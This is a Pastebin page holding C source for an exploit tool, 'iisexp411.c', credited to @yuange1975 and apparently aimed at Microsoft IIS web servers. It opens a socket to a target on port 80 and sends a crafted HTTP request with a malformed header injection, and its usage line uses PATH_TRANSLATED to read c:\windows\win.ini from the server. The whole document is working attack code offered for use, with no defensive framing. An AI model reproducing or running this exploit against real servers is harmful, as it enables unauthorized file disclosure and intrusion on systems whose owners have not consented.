Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- usage:
- iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
- /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
- iisexp411.c ver4.1.1 copy by @yuange1975 2012.4.2
- 1.Changing the input parameters 2.To increase the receive data
- 假作真时真亦假。True Mingled also false.
- http://weibo.com/yuange1975
- http://twitter.com/yuange75
- http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
- */
- #include <stdio.h>
- #include <stdlib.h>#include <winsock2.h>
- #include <windows.h>
- #include <mswsock.h>
- #include <wsnwlink.h>
- #include <ws2tcpip.h>
- #include <process.h> /* _beginthread, _endthread */
- #include <errno.h>
- #include <io.h>
- #include <conio.h>#pragma comment(lib,"ws2_32")
- #pragma comment(lib,"Mswsock")/*
- char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
- */
- char *AprilFoolsDay ="GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n"; static unsigned int maybe_lookup_host(char*
- name)
- {
- unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */
- ulAddr = inet_addr((char*)name);
- if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
- return (unsigned int)ulAddr; return 0;
- }int do_exp(char *hostname,unsigned int port,char *AprilFools, char *c,char *shellcode)
- {
- SOCKET hScoket = INVALID_SOCKET;
- struct sockaddr_in sin;
- unsigned int addr=0;
- int write_res = 0;
- int read_res = 0;
- char crash_buf[0x4000];
- int crash_buflen=0;
- /*
- create SOCKET
- */
- hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
- if (hScoket == INVALID_SOCKET) {
- printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
- return -1;
- } /* Resolved IP address */
- addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
- sin.sin_port = htons(port);
- memcpy(&sin.sin_addr,&addr,4); /*
- connect
- */
- if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
- if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
- closesocket(hScoket);
- printf_s("connect function failed with error: %ld\n", WSAGetLastError());
- return -1;
- }
- }
- printf("[*] connected to %s:%d\n",hostname,port);
- //build_crash_package(&crash_buf,&crash_buflen);
- sprintf_s(crash_buf,0x400,AprilFoolsDay,AprilFools,hostname,c,shellcode);
- crash_buflen = strlen(crash_buf); //printf("%s",crash_buf);
- /*
- send data to remote target
- */
- write_res = send( hScoket,
- crash_buf,
- crash_buflen,
- 0);
- printf("[*] send %d bytes\n\n",write_res);
- while(1){
- read_res = recv( hScoket,
- crash_buf,
- 0x4000-1,
- 0);
- if(read_res<=0) break;
- crash_buf[read_res]=0;
- printf("%s",crash_buf);
- } closesocket(hScoket);
- return 0;
- }int main(int argc, const char **argv)
- {
- int iResult;
- char * target_ip = (char*)argv[1];
- char *AprilFools="/AprilFools'Day.php";
- char *c="c";
- char *shellcode="shellcode";
- WSADATA wsaData; if ( !target_ip || argc < 2 ) {
- printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
- return 0;
- }
- if(argc>2) AprilFools=(char*)argv[2];
- if(argc>3) c= (char*)argv[3];
- if(argc>4) shellcode=(char*)argv[4];
- /* Initialize Winsock */
- iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
- if (iResult != 0) {
- printf_s("WSAStartup failed: %d\n", iResult);
- return -1;
- } do_exp(target_ip,80,AprilFools,c,shellcode);
- /* clean - win socket */
- WSACleanup(); return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement